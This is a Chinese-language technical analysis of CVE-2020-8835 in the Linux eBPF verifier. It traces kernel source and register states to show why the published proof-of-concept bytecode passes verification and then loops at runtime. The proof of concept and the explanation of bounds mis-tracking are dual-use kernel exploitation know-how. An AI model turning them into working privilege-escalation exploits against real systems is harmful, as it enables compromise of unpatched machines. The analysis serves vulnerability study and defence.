CVE-2020-8835：Linux eBPF模块verifier组件漏洞分析-安全KER

eBPF简介

bpf系统调用执行一系列与extended Berkeley Packet Filters相关的操作，eBPF与传统的BPF相似，作用为过滤网络包。对于eBPF和传统的BPF来说，为了确保它们进行的操作不会损伤运行时的系统，内核会在加载程序之前静态地分析它们。

简而言之，eBPF可以加载数据过滤代码到内核，并在进行相关操作的时候触发代码

通常见到的seccomp沙箱就是使用了eBPF模块

eBPF程序的载入

bpf_insn

bpf_insn是一个结构体，代表一条eBPF指令

struct bpf_insn {
    __u8    code;        /* opcode */
    __u8    dst_reg:4;    /* dest register */
    __u8    src_reg:4;    /* source register */
    __s16    off;        /* signed offset */
    __s32    imm;        /* signed immediate constant */
};

每一个eBPF程序都是一个bpf_insn数组，使用bpf系统调用将其载入内核

具体每个字段的含义可以随之后的分析进行了解

bpf_prog_load

要将eBPF程序载入内核中，需要使用bpf系统调用

#define LOG_BUF_SIZE 65536
#define __NR_BPF 321
char bpf_log_buf[LOG_BUF_SIZE];
int bpf_prog_load(enum bpf_prog_type type,
                  const struct bpf_insn *insns, int insn_cnt,
                  const char *license)
{
    union bpf_attr attr = {
        .prog_type = type,
        .insns = ptr_to_u64(insns),
        .insn_cnt = insn_cnt,
        .license = ptr_to_u64(license),
        .log_buf = ptr_to_u64(bpf_log_buf),
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    return syscall(__NR_BPF, BPF_PROG_LOAD, &attr, sizeof(attr));
}

其中，type表示eBPF程序类型，不同类型的程序作用不同，例如当type为BPF_PROG_TYPE_SOCKET_FILTER时，表示该程序的作用是过滤进出口网络报文

insns是bpf_insn数组，表示该程序的指令

insn_cnt表示指令的条数

license必须为"GPL"

bpf_log_bpf中存储的是log信息，可以在程序载入内核之后打印它，能获取比较详细的验证时信息

load_prog

int load_prog()
{
    struct bpf_insn prog[] = {
        ……
        /*
        指令……
        */
    };
    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog)/sizeof(struct bpf_insn), "GPL");
}

如此这般，如何在用户态将一个eBPF程序载入内核就清楚了

漏洞分析

2020年3月30日，漏洞作者分享了他触发漏洞的一段eBPF程序[1]

0: (b7) r0 = 808464432
1: (7f) r0 >>= r0
2: (14) w0 -= 808464432
3: (07) r0 += 808464432
4: (b7) r1 = 808464432
5: (de) if w1 s<= w0 goto pc+0
6: (07) r0 += -2144337872
7: (14) w0 -= -1607454672
8: (25) if r0 > 0x30303030 goto pc+0
9: (76) if w0 s>= 0x303030 goto pc+2
10: (05) goto pc-1
11: (05) goto pc-1
12: (95) exit

这段程序触发会使当前进程空转，陷入死循环

乍一看，两个goto pc-1，当然会陷入死循环了，那这个Poc还有什么参考价值？

bpf_check

以Linux v5.6-rc5的代码为例[2]，源码于[4]下载

在使用bpf系统调用将eBPF程序载入内核时，内核会对载入的程序进行合法性检测，以此来保证程序的安全性

在bpf_check中有两个主要的检查，一个是check_cfg，检查程序流程图，另一个是do_check_main，模拟执行程序来检查是否有非法操作

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
          union bpf_attr __user *uattr)
{
    u64 start_time = ktime_get_ns();
    struct bpf_verifier_env *env;
    struct bpf_verifier_log *log;
    int i, len, ret = -EINVAL;
    bool is_priv;

    ……
    ret = check_cfg(env);        <------------
    if (ret < 0)
        goto skip_full_check;

    ret = do_check_subprogs(env);
    ret = ret ?: do_check_main(env);    <-------------

    ……
}

check_cfg

static int check_cfg(struct bpf_verifier_env *env)
{
    struct bpf_insn *insns = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int *insn_stack, *insn_state;
    int ret = 0;
    int i, t;

    insn_state = env->cfg.insn_state = kvcalloc(insn_cnt, sizeof(int), GFP_KERNEL);
    if (!insn_state)
        return -ENOMEM;

    insn_stack = env->cfg.insn_stack = kvcalloc(insn_cnt, sizeof(int), GFP_KERNEL);
    if (!insn_stack) {
        kvfree(insn_state);
        return -ENOMEM;
    }

    insn_state[0] = DISCOVERED; /* mark 1st insn as discovered */
    insn_stack[0] = 0; /* 0 is the first instruction */
    env->cfg.cur_stack = 1;

peek_stack:
    if (env->cfg.cur_stack == 0)
        goto check_state;
    t = insn_stack[env->cfg.cur_stack - 1];

    if (BPF_CLASS(insns[t].code) == BPF_JMP ||
        BPF_CLASS(insns[t].code) == BPF_JMP32) {
        u8 opcode = BPF_OP(insns[t].code);

        if (opcode == BPF_EXIT) {
            goto mark_explored;
        } else if (opcode == BPF_CALL) {
            ret = push_insn(t, t + 1, FALLTHROUGH, env, false);
            if (ret == 1)
                goto peek_stack;
            else if (ret < 0)
                goto err_free;
            if (t + 1 < insn_cnt)
                init_explored_state(env, t + 1);
            if (insns[t].src_reg == BPF_PSEUDO_CALL) {
                init_explored_state(env, t);
                ret = push_insn(t, t + insns[t].imm + 1, BRANCH,
                        env, false);
                if (ret == 1)
                    goto peek_stack;
                else if (ret < 0)
                    goto err_free;
            }
        } else if (opcode == BPF_JA) {
            if (BPF_SRC(insns[t].code) != BPF_K) {
                ret = -EINVAL;
                goto err_free;
            }
            /* unconditional jump with single edge */
            ret = push_insn(t, t + insns[t].off + 1,    <----------------- 1
                    FALLTHROUGH, env, true);
            if (ret == 1)
                goto peek_stack;
            else if (ret < 0)
                goto err_free;
            /* unconditional jmp is not a good pruning point,
             * but it's marked, since backtracking needs
             * to record jmp history in is_state_visited().
             */
            init_explored_state(env, t + insns[t].off + 1);
            /* tell verifier to check for equivalent states
             * after every call and jump
             */
            if (t + 1 < insn_cnt)
                init_explored_state(env, t + 1);
        } else {
            /* conditional jump with two edges */
            init_explored_state(env, t);
            ret = push_insn(t, t + 1, FALLTHROUGH, env, true);
            if (ret == 1)
                goto peek_stack;
            else if (ret < 0)
                goto err_free;

            ret = push_insn(t, t + insns[t].off + 1, BRANCH, env, true);
            if (ret == 1)
                goto peek_stack;
            else if (ret < 0)
                goto err_free;
        }
    } else {
        /* all other non-branch instructions with single
         * fall-through edge
         */
        ret = push_insn(t, t + 1, FALLTHROUGH, env, false);
        if (ret == 1)
            goto peek_stack;
        else if (ret < 0)
            goto err_free;
    }

mark_explored:                <------------------------ 2
    insn_state[t] = EXPLORED;
    if (env->cfg.cur_stack-- <= 0) {
        verbose(env, "pop stack internal bugn");
        ret = -EFAULT;
        goto err_free;
    }
    goto peek_stack;

check_state:                <------------------------ 3
    for (i = 0; i < insn_cnt; i++) {
        if (insn_state[i] != EXPLORED) {
            verbose(env, "unreachable insn %dn", i);
            ret = -EINVAL;
            goto err_free;
        }
    }
    ret = 0; /* cfg looks good */

err_free:
    kvfree(insn_state);
    kvfree(insn_stack);
    env->cfg.insn_state = env->cfg.insn_stack = NULL;
    return ret;
}

代码中，insn_state[i]代表第i条指令的状态，EXPLORED表示第i条指令已经被遍历过了

故箭头标记2处，表示标记一条指令被经过，然后再去取下一条指令

箭头3处，有一个for循环来检查所有指令是否已经被遍历过，如果有任何一条指令没有被遍历，则返回错误码，并在log中写入错误信息unreachable insn

因此，一个合格的eBPF程序要满足的第一个条件是，没有不可到达的指令

另外，也要注意箭头1处所指的函数pusn_insn

在程序中有opcode为BPF_JA，即 “无条件跳转” 的时候，会调用push_insn(t, t + insns[t].off + 1, FALLTHROUGH, env, true);来把下一条指令push入栈

这里，t是当前指令的索引，t+insns[t].off+1是下一条指令的索引

/* t, w, e - match pseudo-code above:
 * t - index of current instruction
 * w - next instruction
 * e - edge
 */
static int push_insn(int t, int w, int e, struct bpf_verifier_env *env,
             bool loop_ok)
{
    int *insn_stack = env->cfg.insn_stack;
    int *insn_state = env->cfg.insn_state;

    if (e == FALLTHROUGH && insn_state[t] >= (DISCOVERED | FALLTHROUGH))
        return 0;

    if (e == BRANCH && insn_state[t] >= (DISCOVERED | BRANCH))
        return 0;

    if (w < 0 || w >= env->prog->len) {
        verbose_linfo(env, t, "%d: ", t);
        verbose(env, "jump out of range from insn %d to %dn", t, w);
        return -EINVAL;
    }

    if (e == BRANCH)
        /* mark branch target for state pruning */
        init_explored_state(env, w);

    if (insn_state[w] == 0) {
        /* tree-edge */
        insn_state[t] = DISCOVERED | e;
        insn_state[w] = DISCOVERED;
        if (env->cfg.cur_stack >= env->prog->len)
            return -E2BIG;
        insn_stack[env->cfg.cur_stack++] = w;
        return 1;
    } else if ((insn_state[w] & 0xF0) == DISCOVERED) {
        if (loop_ok && env->allow_ptr_leaks)        <----------------- 1
            return 0;
        verbose_linfo(env, t, "%d: ", t);
        verbose_linfo(env, w, "%d: ", w);
        verbose(env, "back-edge from insn %d to %dn", t, w);
        return -EINVAL;
    } else if (insn_state[w] == EXPLORED) {
        /* forward- or cross-edge */
        insn_state[t] = DISCOVERED | e;
    } else {
        verbose(env, "insn state internal bugn");
        return -EFAULT;
    }
    return 0;
}

箭头1处，如果insn_state[w]即下一条指令的状态为DISCOVERED，即当前的无条件跳转指令是往回跳的，就会进入箭头1这一分支。这时，loop_ok为1，如果env->allow_ptr_leaks为0的话，会报错back-edge，如果非0，则会继续运行

那么，env->allow_ptr_leaks是由什么影响的呢？

在bpf_check函数中有这么两句

……
is_priv = capable(CAP_SYS_ADMIN);
……
env->allow_ptr_leaks = is_priv;
……

意味如果当前用户有CAP_SYS_ADMIN这个权限，那么env->allow_ptr_leaks就是1，否则就是0 。那么一般我们的用户不是root，没有这个权限，因此env->allow_ptr_leaks一般为0

这样的话，如果我们的eBPF程序中有往回跳转的指令，push_insn函数就会报错

因此，一个权限一般的合格的eBPF程序要满足的第二个条件是，没有往回跳转的指令

到这里，一般用户能正常通过check_cfg这一个函数所需要的条件就很明白了：

没有不可到达的指令
没有往回跳转的指令
没有跳的太远超出指令范围的指令

而本文开始所展示的eBPF程序不符合第一个条件和第二个条件，那么它又是如何被载入内核的呢？

do_check_main

static int do_check_main(struct bpf_verifier_env *env)
{
    int ret;

    env->insn_idx = 0;
    ret = do_check_common(env, 0);
    if (!ret)
        env->prog->aux->stack_depth = env->subprog_info[0].stack_depth;
    return ret;
}

do_check_main函数中，调用了do_check_commin

static int do_check_common(struct bpf_verifier_env *env, int subprog)
{
    ……
    ret = do_check(env);
    ……
}

且不管其他，我们主要注意的地方是这个do_check函数。在该函数中，内核会模拟执行被载入的程序，并逐条指令检查其合法性。何为不合法？eBPF程序的指令是包括内存存取相关指令的，因此对被存取的指针它会有类型以及范围的限定，而且限定非常严格。如果说限定的部分有漏洞，或者其他的原因导致限定失效，那么将会带来非常恐怖的后果。例如任意地址读写

在遇到具有分支，例如if xxx goto pc+x这样的语句，内核会检测if判断的条件是否恒成立。若判断为恒成立或者恒不成立，则只分析相应的那一分支，而另一分支则不进行分析。没有被分析到的指令被视为dead code

Poc分析

Poc的c文件链接在文末[3]，注意要用普通用户执行Poc

0: (b7) r0 = 808464432
1: (7f) r0 >>= r0
2: (14) w0 -= 808464432
3: (07) r0 += 808464432
4: (b7) r1 = 808464432
5: (de) if w1 s<= w0 goto pc+0
6: (07) r0 += -2144337872
7: (14) w0 -= -1607454672
8: (25) if r0 > 0x30303030 goto pc+0
9: (76) if w0 s>= 0x303030 goto pc+2
10: (05) goto pc-1
11: (05) goto pc-1
12: (95) exit

首先先回答一个问题，为什么goto pc-1这样不能通过check_cfg的指令会被载入到内核中呢？

答案在bpf_check函数中

就在调用do_check_main那条语句的下方，还有几条代码

if (is_priv) {
        if (ret == 0)
            opt_hard_wire_dead_code_branches(env);
        if (ret == 0)
            ret = opt_remove_dead_code(env);
        if (ret == 0)
            ret = opt_remove_nops(env);
    } else {
        if (ret == 0)
            sanitize_dead_code(env);
    }

代码中，is_priv为何物我们已经了解，如果用户为root的话，is_priv为1，用户为具有一般权限的一般用户的话，其为0

关于is_priv为1的情况下内核究竟对eBPF程序做了什么不去细说，总结为一句话就是：内核将dead code全部替换为exit，即退出指令

那么接下来来看sanitize_dead_code函数

/* The verifier does more data flow analysis than llvm and will not
 * explore branches that are dead at run time. Malicious programs can
 * have dead code too. Therefore replace all dead at-run-time code
 * with 'ja -1'.
 *
 * Just nops are not optimal, e.g. if they would sit at the end of the
 * program and through another bug we would manage to jump there, then
 * we'd execute beyond program memory otherwise. Returning exception
 * code also wouldn't work since we can have subprogs where the dead
 * code could be located.
 */
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
    struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
    struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
    struct bpf_insn *insn = env->prog->insnsi;
    const int insn_cnt = env->prog->len;
    int i;

    for (i = 0; i < insn_cnt; i++) {
        if (aux_data[i].seen)
            continue;
        memcpy(insn + i, &trap, sizeof(trap));
    }
}

注释写的很清楚，这个函数会将所有的dead code改为goto pc-1，这样就能解释清楚Poc中10，11这两句不合法语句的来历了

内核在检查程序合法性的过程中，第9句在检查时被判断为恒成立，之后的检查便只检查了第12句，第10和第11句被视为dead code，在之后的sanitize_dead_code函数中被修改为goto pc-1。而没有想到的是，在实际执行的时候第9句实际上是恒不成立，因此就导致程序执行了goto pc-1。在实际执行跳转指令的时候，跳转的偏移会默认加1，因此实际上goto pc-1跳转到的地方不是自己的上一条，而是自己，这就导致程序空转，陷入死循环

那么为什么在检查的时候第九句的状态和实际执行时的状态不同呢？我们来一步步动态地分析一下

在分析之前，要先了解寄存器结构体

struct bpf_reg_state {
    enum bpf_reg_type type;
    union {
        /* valid when type == PTR_TO_PACKET */
        u16 range;

        /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
         *   PTR_TO_MAP_VALUE_OR_NULL
         */
        struct bpf_map *map_ptr;

        u32 btf_id; /* for PTR_TO_BTF_ID */

        /* Max size from any of the above. */
        unsigned long raw;
    };
    s32 off;
    u32 id;
    u32 ref_obj_id;
    /* For scalar types (SCALAR_VALUE), this represents our knowledge of
     * the actual value.
     * For pointer types, this represents the variable part of the offset
     * from the pointed-to object, and is shared with all bpf_reg_states
     * with the same id as us.
     */
    struct tnum var_off;
    /* Used to determine if any memory access using this register will
     * result in a bad access.
     * These refer to the same value as var_off, not necessarily the actual
     * contents of the register.
     */
    s64 smin_value; /* minimum possible (s64)value */
    s64 smax_value; /* maximum possible (s64)value */
    u64 umin_value; /* minimum possible (u64)value */
    u64 umax_value; /* maximum possible (u64)value */
    struct bpf_reg_state *parent;
    u32 frameno;
    s32 subreg_def;
    enum bpf_reg_liveness live;
    /* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
    bool precise;
};

理解该漏洞之前要先理解该结构体，要注意的一个字段是var_off，它是一个tnum结构体

/* tnum: tracked (or tristate) numbers
 *
 * A tnum tracks knowledge about the bits of a value.  Each bit can be either
 * known (0 or 1), or unknown (x).  Arithmetic operations on tnums will
 * propagate the unknown bits such that the tnum result represents all the
 * possible results for possible values of the operands.
 */
struct tnum {
    u64 value;
    u64 mask;
};

tnum的注释没太懂，我的理解是：

mask为0的时候，表示该tnum是一个数字，值为value
mask非0的时候，表示一个范围，所有与mask进行与操作不为0的数字都在这个范围内，而此时的value只是该范围内的一个数字，并不精确

0: (b7) r0 = 808464432

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x30303030,
    mask = 0x0
  },
  smin_value = 0x30303030,
  smax_value = 0x30303030,
  umin_value = 0x30303030,
  umax_value = 0x30303030,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

此时，r0存储着一个确定的值，为0x30303030

1: (7f) r0 >>= r0

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0xffffffffffffffff
  },
  smin_value = 0x8000000000000000,
  smax_value = 0x7fffffffffffffff,
  umin_value = 0x0,
  umax_value = 0xffffffffffffffff,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

可以看到var_off改变了，变为了一个完全不确定的值，且smin_value, smax_value, umin_value, umax_value都变为了相应范围的最大最小值

相应代码如下：

case BPF_RSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        scalar_min_max_rsh(dst_reg, &src_reg);
        break;

这里的umax_val就是r0->umax_val，在执行到这里的时候，为0x30303030，大于insn_bitness即64，所以就会标记寄存器为unknown

static void mark_reg_unknown(struct bpf_verifier_env *env,
                 struct bpf_reg_state *regs, u32 regno)
{
    if (WARN_ON(regno >= MAX_BPF_REG)) {
        verbose(env, "mark_reg_unknown(regs, %u)n", regno);
        /* Something bad happened, let's kill all regs except FP */
        for (regno = 0; regno < BPF_REG_FP; regno++)
            __mark_reg_not_init(env, regs + regno);
        return;
    }
    __mark_reg_unknown(env, regs + regno);
}

static void __mark_reg_unknown(const struct bpf_verifier_env *env,
                   struct bpf_reg_state *reg)
{
    /*
     * Clear type, id, off, and union(map_ptr, range) and
     * padding between 'type' and union
     */
    memset(reg, 0, offsetof(struct bpf_reg_state, var_off));
    reg->type = SCALAR_VALUE;
    reg->var_off = tnum_unknown;
    reg->frameno = 0;
    reg->precise = env->subprog_cnt > 1 || !env->allow_ptr_leaks ?
               true : false;
    __mark_reg_unbounded(reg);
}

static void __mark_reg_unbounded(struct bpf_reg_state *reg)
{
    reg->smin_value = S64_MIN;
    reg->smax_value = S64_MAX;
    reg->umin_value = 0;
    reg->umax_value = U64_MAX;
}

可以看到，mark_reg_unknown总共做了这些事：

reg->type = SCALAR_VALUE
reg->var_off = {0, 0xffffffffffffffff}
reg->smin_value = 0x8000000000000000
reg->smax_value = 0x7fffffffffffffff
reg->umin_value = 0
reg->umax_value = 0xffffffffffffffff

2: (14) w0 -= 808464432

主要代码位于adjust_scalar_min_max_vals函数中

static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                      struct bpf_insn *insn,
                      struct bpf_reg_state *dst_reg,
                      struct bpf_reg_state src_reg)
{
    struct bpf_reg_state *regs = cur_regs(env);
    u8 opcode = BPF_OP(insn->code);
    bool src_known, dst_known;
    s64 smin_val, smax_val;
    u64 umin_val, umax_val;
    u64 insn_bitness = (BPF_CLASS(insn->code) == BPF_ALU64) ? 64 : 32;
    u32 dst = insn->dst_reg;
    int ret;

    if (insn_bitness == 32) {
        /* Relevant for 32-bit RSH: Information can propagate towards
         * LSB, so it isn't sufficient to only truncate the output to
         * 32 bits.
         */
        coerce_reg_to_size(dst_reg, 4);
        coerce_reg_to_size(&src_reg, 4);
    }

    smin_val = src_reg.smin_value;
    smax_val = src_reg.smax_value;
    umin_val = src_reg.umin_value;
    umax_val = src_reg.umax_value;
    src_known = tnum_is_const(src_reg.var_off);
    dst_known = tnum_is_const(dst_reg->var_off);

    ……

    switch (opcode) {
    ……
    case BPF_SUB:
        ret = sanitize_val_alu(env, insn);
        if (ret < 0) {
            verbose(env, "R%d tried to sub from different pointers or scalarsn", dst);
            return ret;
        }
        scalar_min_max_sub(dst_reg, &src_reg);
        break;
    ……
    }

    if (BPF_CLASS(insn->code) != BPF_ALU64) {
        /* 32-bit ALU ops are (32,32)->32 */
        coerce_reg_to_size(dst_reg, 4);
    }

    __update_reg_bounds(dst_reg);
    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

由于该条指令使用的是32位寄存器，因此会先调用coerce_reg_to_size将寄存器转化为32位的

static void coerce_reg_to_size(struct bpf_reg_state *reg, int size)
{
    u64 mask;

    /* clear high bits in bit representation */
    reg->var_off = tnum_cast(reg->var_off, size);

    /* fix arithmetic bounds */
    mask = ((u64)1 << (size * 8)) - 1;
    if ((reg->umin_value & ~mask) == (reg->umax_value & ~mask)) {
        reg->umin_value &= mask;
        reg->umax_value &= mask;
    } else {
        reg->umin_value = 0;
        reg->umax_value = mask;
    }
    reg->smin_value = reg->umin_value;
    reg->smax_value = reg->umax_value;
}

转换完之后，寄存器的状态：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0xffffffff
  },
  smin_value = 0x0,
  smax_value = 0xffffffff,
  umin_value = 0x0,
  umax_value = 0xffffffff,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x3,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

之后开始做减法，此时的src_reg其实就是808464432，只不过是用一个暂时的寄存器将其保存了

5: (de) if w1 s<= w0 goto pc+0

执行这条语句之前，r0和r1的状态分别为：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0x1ffffffff
  },
  smin_value = 0x30303030,
  smax_value = 0x13030302f,
  umin_value = 0x30303030,
  umax_value = 0x13030302f,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

$r1 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x30303030,
    mask = 0x0
  },
  smin_value = 0x30303030,
  smax_value = 0x30303030,
  umin_value = 0x30303030,
  umax_value = 0x30303030,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

执行这条语句之后，r0的状态变为：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x30303020,
    mask = 0x10000001f
  },
  smin_value = 0x30303030,
  smax_value = 0x13030302f,
  umin_value = 0x30303030,
  umax_value = 0x13030302f,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

下面来解释下为什么会有这样的变化

在遇到跳转指令的时候，会调用check_cond_jmp_op来检查该指令

在该函数中，由于r0不是一个确定的数字，因此会调用reg_set_min_max_inv来设置寄存器的最大最小值

static void reg_set_min_max_inv(struct bpf_reg_state *true_reg,
                struct bpf_reg_state *false_reg, u64 val,
                u8 opcode, bool is_jmp32)
{
    s64 sval;

    if (__is_pointer_value(false, false_reg))
        return;

    val = is_jmp32 ? (u32)val : val;
    sval = is_jmp32 ? (s64)(s32)val : (s64)val;

    switch (opcode) {
    ……
    case BPF_JSLE:
    case BPF_JSLT:
    {
        s64 false_smax = opcode == BPF_JSLT ? sval    : sval - 1;
        s64 true_smin = opcode == BPF_JSLT ? sval + 1 : sval;

        if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
            break;
        false_reg->smax_value = min(false_reg->smax_value, false_smax);
        true_reg->smin_value = max(true_reg->smin_value, true_smin);
        break;
    }
    default:
        break;
    }

    __reg_deduce_bounds(false_reg);
    __reg_deduce_bounds(true_reg);
    /* We might have learned some bits from the bounds. */
    __reg_bound_offset(false_reg);
    __reg_bound_offset(true_reg);
    if (is_jmp32) {            <----------------------
        __reg_bound_offset32(false_reg);    <-------------------
        __reg_bound_offset32(true_reg);        <-------------------
    }
    /* Intersecting with the old var_off might have improved our bounds
     * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
     * then new var_off is (0; 0x7f...fc) which improves our umax.
     */
    __update_reg_bounds(false_reg);
    __update_reg_bounds(true_reg);
}

这里的false_reg和true_reg表示两种状态，即该if不成立时的reg和if成立时的reg

漏洞所处代码就在箭头所指的地方，这里仅跟进false_reg

先说明执行__reg_bound_offset32函数之前，false_reg的状态

$false_reg = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x0,
    mask = 0x1ffffffff
  },
  smin_value = 0x30303030,
  smax_value = 0x13030302f,
  umin_value = 0x30303030,
  umax_value = 0x13030302f,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
    u64 mask = 0xffffFFFF;
    struct tnum range = tnum_range(reg->umin_value & mask,
                       reg->umax_value & mask);
    struct tnum lo32 = tnum_cast(reg->var_off, 4);
    struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);

    reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

该函数执行完之后，寄存器的状态变为：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x30303020,
    mask = 0x10000001f
  },
  smin_value = 0x30303030,
  smax_value = 0x13030302f,
  umin_value = 0x30303030,
  umax_value = 0x13030302f,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

再之后，执行__update_reg_bounds(false_reg)之后：

static void __update_reg_bounds(struct bpf_reg_state *reg)
{
    /* min signed is max(sign bit) | min(other bits) */
    reg->smin_value = max_t(s64, reg->smin_value,
                reg->var_off.value | (reg->var_off.mask & S64_MIN));
    /* max signed is min(sign bit) | max(other bits) */
    reg->smax_value = min_t(s64, reg->smax_value,
                reg->var_off.value | (reg->var_off.mask & S64_MAX));
    reg->umin_value = max(reg->umin_value, reg->var_off.value);
    reg->umax_value = min(reg->umax_value,
                  reg->var_off.value | reg->var_off.mask);
}

reg不变，这里可以推导一下

6: (07) r0 += -2144337872

执行完这一句之后，寄存器状态：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0xb0603040,
    mask = 0xffffffff0000003f
  },
  smin_value = 0xffffffffb0603060,
  smax_value = 0xb060305f,
  umin_value = 0x0,
  umax_value = 0xffffffffffffffff,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x0,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

7: (14) w0 -= -1607454672

执行这一句的时候，先会用coerce_reg_to_size把寄存器转换为32位

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0xb0603040,
    mask = 0x3f
  },
  smin_value = 0x0,
  smax_value = 0xffffffff,
  umin_value = 0x0,
  umax_value = 0xffffffff,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x8,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

然后再做减法并改变var_off：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x10300000,
    mask = 0x7f
  },
  smin_value = 0xffffffff5fcfcfd0,
  smax_value = 0x5fcfcfcf,
  umin_value = 0x0,
  umax_value = 0xffffffffffffffff,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x8,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

再coerce_reg_to_size转为32位：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x10300000,
    mask = 0x7f
  },
  smin_value = 0x0,
  smax_value = 0xffffffff,
  umin_value = 0x0,
  umax_value = 0xffffffff,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x8,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

最后，在__update_reg_bounds函数中，寄存器被变为：

$r0 = {
  type = SCALAR_VALUE,
  {
    range = 0x0,
    map_ptr = 0x0 <fixed_percpu_data>,
    btf_id = 0x0,
    raw = 0x0
  },
  off = 0x0,
  id = 0x0,
  ref_obj_id = 0x0,
  var_off = {
    value = 0x10300000,
    mask = 0x7f
  },
  smin_value = 0x10300000,
  smax_value = 0x1030007f,
  umin_value = 0x10300000,
  umax_value = 0x1030007f,
  parent = 0x0 <fixed_percpu_data>,
  frameno = 0x0,
  subreg_def = 0x8,
  live = REG_LIVE_WRITTEN,
  precise = 0x1
}

